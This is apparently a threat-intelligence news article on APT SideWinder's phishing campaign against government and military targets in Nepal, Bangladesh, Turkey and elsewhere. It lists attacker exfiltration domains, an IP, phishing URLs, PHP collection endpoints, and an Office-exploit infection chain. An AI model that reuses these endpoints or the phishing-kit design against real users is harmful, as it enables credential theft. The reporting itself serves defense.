APT SideWinder, a persistent threat actor believed to originate from South Asia, has launched a sophisticated credential harvesting campaign targeting government and military entities across Bangladesh, Nepal, Turkey, and neighboring countries. The group has demonstrated remarkable adaptability in their phishing techniques, creating convincing replicas of official login portals to steal sensitive authentication credentials from high-value targets.
Phishing Techniques and Targeted Entities
The campaign primarily leverages spear-phishing attacks through weaponized documents and malicious links that mimic legitimate government communications. By impersonating trusted institutions, the threat actors successfully trick victims into entering their credentials on fraudulent login pages designed to capture and exfiltrate authentication data to attacker-controlled servers.
Hunt.io analysts identified the operation after investigating a phishing attack targeting Nepal’s Ministry of Defense, which led to the discovery of a broader infrastructure spanning multiple countries and government agencies. The investigation revealed over a dozen phishing domains, each carefully crafted to mimic different agencies including DGDP, DGFI, Bangladesh Police, and Turkish defense contractors like ASELSAN and ROKETSAN.
Infrastructure Analysis and Credential Collection Methods
The technical analysis reveals APT SideWinder’s systematic approach to credential harvesting through centralized collection infrastructure. The group employs two primary credential exfiltration domains: mailbox3-inbox1-bd.com and mailbox-inbox-bd.com, both resolving to IP address 146.70.118.226 hosted by M247 Europe SRL in Frankfurt, Germany.
The phishing pages utilize sophisticated POST request mechanisms to silently transmit stolen credentials. For example, a fake Zimbra login page hosted at mail-mod-gov-np-account-file-data.netlify.app contains JavaScript code that submits user credentials to https://mailbox3-inbox1-bd.com/3456.php through concealed form submissions. The HTML source code maintains authentic titles like “Zimbra Web Client Sign In” to enhance credibility while executing malicious backend operations.
The campaign demonstrates infrastructure reuse across different targeting scenarios, with consistent backend scripts like /2135.php and /idef.php being deployed across multiple phishing kits. This template-based approach indicates automated deployment capabilities, allowing the threat actors to rapidly scale their operations while maintaining operational continuity even when individual URLs are compromised or blocked.
Enhanced Toolset and Tactics
SideWinder’s tactics involve spear-phishing emails with malicious DOCX attachments that exploit the CVE-2017-11882 vulnerability. These emails use remote template injection to download RTF files from attacker-controlled servers, leading to the execution of a multi-level infection process. The malware, known as “Backdoor Loader,” acts as a loader for the “StealerBot” post-exploitation toolkit.
SideWinder continuously updates its tools to evade detection, often within hours of being identified by security software. This includes changing file names and paths, as well as employing anti-analysis techniques like Control Flow Flattening to complicate detection.
The group’s malware has evolved to include a new version of the “Downloader Module,” which more effectively identifies installed security solutions using advanced WMI queries. It also checks for specific process names associated with popular security software. Additionally, a C++ version of the “Backdoor Loader” has been discovered, indicating a shift towards more customized and targeted attacks.
Targeted Sectors and Regions
SideWinder’s attacks have expanded across various sectors, including telecommunications, consulting, IT services, real estate, and hotels. Geographically, the group has targeted entities in countries such as Austria, Bangladesh, Cambodia, Djibouti, Egypt, Indonesia, Mozambique, Myanmar, Nepal, Pakistan, Philippines, Sri Lanka, the United Arab Emirates, and Vietnam. Diplomatic entities in Afghanistan, Algeria, Bulgaria, China, India, the Maldives, Rwanda, Saudi Arabia, Turkey, and Uganda have also been targeted.
SideWinder’s ability to quickly update its tools and evade detection makes it a formidable threat. To counter these attacks, organizations should prioritize patch management and use comprehensive security solutions that include incident detection and response capabilities. Regular employee training on security awareness is also crucial, given the reliance on spear-phishing as an initial attack vector.
As SideWinder continues to evolve, maintaining vigilance and updating security measures will be essential for protecting against these sophisticated cyber threats.
